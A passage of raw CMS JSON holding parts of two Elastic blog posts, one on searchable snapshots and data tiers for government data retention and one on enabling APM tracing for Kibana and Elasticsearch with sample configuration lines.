12pt;'\u003eElastic's cold and frozen tiers perform with search speeds comparable to competitors' hot tiers, often eliminating the need for a warm tier. This approach allows storage of up to 20 times more read-only data at the same cost, reducing total ownership costs and enhancing data availability, compliance, and business outcomes.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csec65e5bf9c322602"}}},{"image":{"image":{"uid":"bltcd612566899a1c1e","_version":1,"title":"elastic searchable snapshots.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-01-23T14:48:50.873Z","updated_at":"2025-01-23T14:48:50.873Z","content_type":"image/png","file_size":"393569","filename":"elastic_searchable_snapshots.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-01-23T15:02:08.455Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcd612566899a1c1e/679256d2e92e09ae76c65f92/elastic_searchable_snapshots.png"},"_metadata":{"uid":"csc8d6a8540fb442e9"},"caption_l10n":"","alt_text_l10n":"elastic searchable snapshots","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"How do searchable snapshots work?","_metadata":{"uid":"cs7408009795539cf4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSearchable snapshots allow you to retain data in low-cost object storage, managed through Elastic, and search without rehydration —\u0026nbsp;avoiding delays, transit costs, and potential data residency issues. This is particularly beneficial for data in the frozen tier, where the cost of storage is minimized, but the data remains accessible for analytical and compliance purposes.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSnapshot creation: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eData from the Elastic cluster is periodically captured and stored as snapshots in the chosen object storage repository. These snapshots are point-in-time copies of indices.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSearchability: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eUnlike traditional snapshots that require rehydration before querying, searchable snapshots enable direct querying of data stored in object storage.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCost efficiency: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBy storing data in object storage through Elastic, organizations benefit from the lower costs associated with these services compared to traditional block storage.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eFast performance via cache: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic uses cache for frequently used searches, which speeds up queries. \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIf a search requires data that is not in the cache, Elasticsearch fetches the missing data from the snapshot repository. Searches that require these fetches are slower, but the fetched data is stored in the cache so that similar searches can be served more quickly in the future. Elasticsearch will evict infrequently used data from the cache to free up space. The cache is cleared when a node is restarted.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis approach significantly reduces the total cost of ownership, making it an ideal choice for government entities with tight budgets.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Offloading longer-term data by setting up a snapshot repository","_metadata":{"uid":"cs5cb1a353cbb51a16"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic integrates with multiple object storage solutions, allowing government agencies to offload data to a repository of their choice, such as AWS, Azure Blob Storage, or Google Cloud Platform. Elasticsearch also offers the option to store data locally for use cases that require regulation or data sovereignty.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHere's how it works:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eRepository setup: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eIn Elastic Cloud, configure a snapshot repository using your preferred cloud storage service. This involves setting up the necessary credentials and permissions to allow Elastic to store and retrieve data from your chosen storage solution.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSearchable snapshots: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eOnce the repository is configured, create searchable snapshots of your indices. These snapshots are stored in the configured repository and can be queried directly without needing to restore them to the Elastic cluster.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCost efficiency and flexibility:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e By using your own storage accounts, you maintain control over your data and can optimize costs based on specific performance needs and retention requirements. Searchable snapshots provide a cost-effective way to retain long-term data while ensuring it remains accessible for analytical and compliance purposes.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshots-register-repository.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eLearn more about snapshot repositories\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"A scalable option for data growth","_metadata":{"uid":"cs3a4f9725dca6b7e0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic's data tiering strategy — from hot to frozen — provides government agencies with a powerful tool for managing long-term data retention in the cloud. By using searchable snapshots and logsdb index mode, agencies can achieve cost savings, scalability, and compliance — all while maintaining the ability to search and analyze data efficiently. As data continues to grow, Elastic offers a sustainable solution for managing and using this valuable resource.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4e00103137afb100"}}},{"callout":{"title_l10n":"","_metadata":{"uid":"csbef4a7d4ad096fbf"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor more detailed guidance on setting up searchable snapshots and integrating with cloud storage, join us for a workshop on long-term data retention for public sector on March 12, 2025. \u003c/span\u003e\u003ca href=\"https://events.elastic.co/optomizedataretention\"\u003e\u003cspan style='font-size: 12pt;'\u003eRegister here\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"callout":{"title_l10n":"","_metadata":{"uid":"cs1b976ea14ee9c6e5"},"paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eRelated resources\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBlog:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elasticsearch-logsdb-index-mode\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLive log and prosper: Elasticsearch newly specialized logsdb index mode\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBlog:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/how-do-incremental-snapshots-work\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow do Elastic search snapshots work?\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBlog:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-splunk-data-tiers-differences\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhat’s the difference? Elastic and Splunk data tiers\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBlog: \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://search-labs/blog/searchable-snapshots-benchmark\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIce, Ice, Maybe: Measuring Searchable Snapshots Performance\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eWhite paper:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/industries/public-sector/accelerate-mission-elastic-global-data-mesh\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAccelerate your mission with Elastic as a data mesh\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs765ced605c031aa0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs24771663ecdc80d0"}}}],"publish_date":"2025-01-23","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt4ce45bbfeeff0638","ACL":{},"created_at":"2021-07-12T21:53:30.326Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"logs","label_l10n":"Logs","tags":[],"title":"Logs","updated_at":"2021-07-12T21:53:30.326Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.411Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt62646ad19dd7b0b8","ACL":{},"created_at":"2020-06-17T03:23:52.847Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"government","label_l10n":"Government","tags":[],"title":"Government","updated_at":"2020-07-06T22:17:42.931Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.550Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","uid":"bltc6e3d049760fc06a","title":"Government","label_l10n":"Government","keyword":"government","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:40:32.959Z","updated_at":"2023-11-06T20:40:32.959Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.338Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt17630d07558c63f6","ACL":{},"created_at":"2023-11-06T21:33:01.038Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"state-local-government","label_l10n":"State \u0026 local government","tags":[],"title":"State \u0026 local government","updated_at":"2023-11-06T21:33:01.038Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:34.342Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","uid":"blt4a47bf681100e8ca","title":"Log management","label_l10n":"Log management","keyword":"log-management","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:42:23.694Z","updated_at":"2023-11-06T20:42:23.694Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.358Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt6f00e40aaa5c6f0e","ACL":{},"created_at":"2020-06-17T03:32:57.128Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"siem","label_l10n":"SIEM","tags":[],"title":"SIEM","updated_at":"2020-07-06T22:20:05.385Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.450Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltf22b73c2722d69f5","_version":1,"title":"Elastic Banner_5 (2).jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-01-23T15:01:31.873Z","updated_at":"2025-01-23T15:01:31.873Z","content_type":"image/jpeg","file_size":"165629","filename":"Elastic_Banner_5_(2).jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-01-23T15:02:08.471Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf22b73c2722d69f5/679259cbee8f389564aa558b/Elastic_Banner_5_(2).jpg"},"title":"Optimizing long-term data retention with Elastic Cloud Hosted: Ensuring compliance and efficiency for government","title_l10n":"Optimizing long-term data retention with Elastic Cloud Hosted: Ensuring compliance and efficiency for government","updated_at":"2025-01-23T15:02:02.360Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-cloud-hosted-data-retention-government-compliance","publish_details":{"time":"2025-01-23T15:02:07.750Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blta4a6a868001023af","_version":17,"locale":"en-us","ACL":{},"abstract_l10n":"Kibana alerting has been around for a while, but there's more in the works to provide better views into what each alert is doing and where it’s spending its time. Learn how we worked to improve the insights you can gather with APM in Kibana.","author":["bltfb64482fc825a009","blt42598b0c9e2fb1a3"],"category":["blte5cc8450a098ce5e"],"created_at":"2023-07-14T17:32:19.734Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"callout":{"title_l10n":"","_metadata":{"uid":"cs62bb069b96d1b0fa"},"paragraph_l10n":"","callout_reference":["bltbce8bba79c5e743a"],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7d06c1616a4de534"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eKibana alerting has been around for quite some time, and major work is going on to give you better views into what each rule is doing and where it’s spending its time.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHowever, there are always questions left, where you just want more. Maybe you are an SRE at a company and need to look over hundreds of clusters. Our built-in dashboards might not suffice, as you need a more granular approach.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGood news! We have been working internally to improve the insights you can gather with APM in Kibana\u003c/span\u003e\u003cspan style='font-size: 0.6em;'\u003e\u003csup\u003e®\u003c/sup\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. Simply activate APM for Kibana with a few configuration steps. This will enable Kibana Real User Monitoring (RUM) and Kibana itself. Additionally, you can opt-in to activate Elasticsearch\u003c/span\u003e\u003cspan style='font-size: 0.6em;'\u003e\u003csup\u003e®\u003c/sup\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e instrumentation and get a deeper understanding of where Elasticsearch is spending its time.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you're interested in gathering usage data from your Kibana users, we have a blog post that can provide helpful tips. Check out our article on \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/3-tips-to-identify-kibana-optimizing-potential\"\u003e\u003cspan style='font-size: 12pt;'\u003eidentifying Kibana optimizing potential\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Activating internal APM","_metadata":{"uid":"cs594c6ac3b4e0be95"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBefore starting, you need your own APM server. That can either be a standalone APM server or the APM integration using Fleet. Activating the Kibana instrumentalization is relatively easy. You must add those three config lines to your Kibana.yml or Cloud console. If you want further information, take a look at the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/kibana-debugging.html#_instrumenting_with_elastic_apm\"\u003e\u003cspan style='font-size: 12pt;'\u003edocs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa6c9d14dbd38356b"}}},{"code":{"code":"elastic.apm.active: true\nelastic.apm.serverUrl: url of the APM server\nelastic.apm.secretToken: Token that the APM server exposes","_metadata":{"uid":"csec963893d4f689c7"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csdfda7843aa254e5c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIt will restart Kibana, and after that, you should see multiple services popping up. One is called \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003ekibana-frontend\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and the other one \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003ekibana\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003eActivating tracing in Elasticsearch is done with static settings (configured in the \u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eelasticsearch.yml\u003c/span\u003e\u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e) and dynamic settings, which can be toggled during runtime using a \u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ePUT _cluster/settings\u003c/span\u003e\u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e command, where one of those dynamic settings is the sampling rate. Some settings, like the sampling rate, can be toggled during the runtime. In the \u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eelasticsearch.yml\u003c/span\u003e\u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e we want to set the following:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003eValid for Version 9.x\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs3adc8ab4f38d762d"}}},{"code":{"code":"telemetry.agent.enabled: true\ntelemetry.agent.server_url: \"url of the APM server\"","_metadata":{"uid":"cse074ecdc43722d4b"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0aa74e2f104326a7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003eValid for Version 7.x and 8.x\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7506a961227e98bc"}}},{"code":{"code":"tracing.apm.enabled: true\ntracing.apm.agent.server_url: \"url of the APM server\"","_metadata":{"uid":"cs7c828543d9805344"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs2e851e6e416db9c5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003eThe secret token (or API key) must be in the Elasticsearch keystore. The keystore tool should be available in \u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e\u003cstrong\u003e\u0026lt;your elasticsearch install directory\u0026gt;/bin/elasticsearch-keystore\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e using the following command for version 7.x and 8.x.:\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eelasticsearch-keystore add tracing.apm.secret_token\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e or \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etracing.apm.api_key\u003c/span\u003e\u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e. For version 9.x please use \u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etelemetry.secret_token\u003c/span\u003e\u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e or \u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etelemetry.api_key\u003c/span\u003e\u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e instead. After that, you need to restart Elasticsearch. More information on tracing can be found in our\u003c/span\u003e\u003ca href=\"https://github.com/elastic/elasticsearch/blob/main/TRACING.md\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003e tracing document\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e.\u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAfter that, we should see three services \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003ekibana\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003ekibana-frontend\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eelasticsearch\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0e10c9b7bf8774ce"}}},{"image":{"image":{"uid":"blt8d3f35dad2b09721","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-07-17T16:56:41.701Z","updated_at":"2023-07-17T16:56:41.701Z","content_type":"image/png","file_size":"117803","filename":"elastic-blog-1-three-services.png","title":"elastic-blog-1-three-services.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-07-17T17:32:20.653Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8d3f35dad2b09721/64b572c9fae2ac02f6baf983/elastic-blog-1-three-services.png"},"_metadata":{"uid":"cs82579d2a55ed8efd"},"caption_l10n":"","alt_text_l10n":"three services","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"First steps","_metadata":{"uid":"cs6f45d6f196402fc2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe want to analyze what is happening behind the scenes when Kibana executes a rule. Click on Kibana and change the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etransaction.type\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etask-run\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. It is usually set to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003erequest\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and can be found in the top left corner. All tasks, such as alerting rules, are under this \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etask-run\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e type. There are many different transactions, so it’s best to explore them. Click on \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eview transactions\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to see a list of all transactions. The name of each transaction is stored in \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etransaction.name\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. You should immediately recognize that the tasks have distinguishable names such as \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eExecute Alerting Rule: “Disk Usage”\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. The transaction name derives from the following: \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eExecute Alerting Rule: “Rule Name”\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThere are quite a lot in my cluster. You will see the name, and the latency (avg.) tells you the average latency of the entire rule when the rule is started by Kibana, doing all searches, processing the data and creating, if necessary, an alert as well. The throughput is determined mostly by the interval of the rule. If it runs every second, I would expect it to be at 60 transactions per minute. The failed transaction rate showcases all rules that have had any failures. It could be due to various issues — maybe the index does not exist, you don’t have enough permissions to query the index, and many more.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLet’s look at the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eStrava No New Activities\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 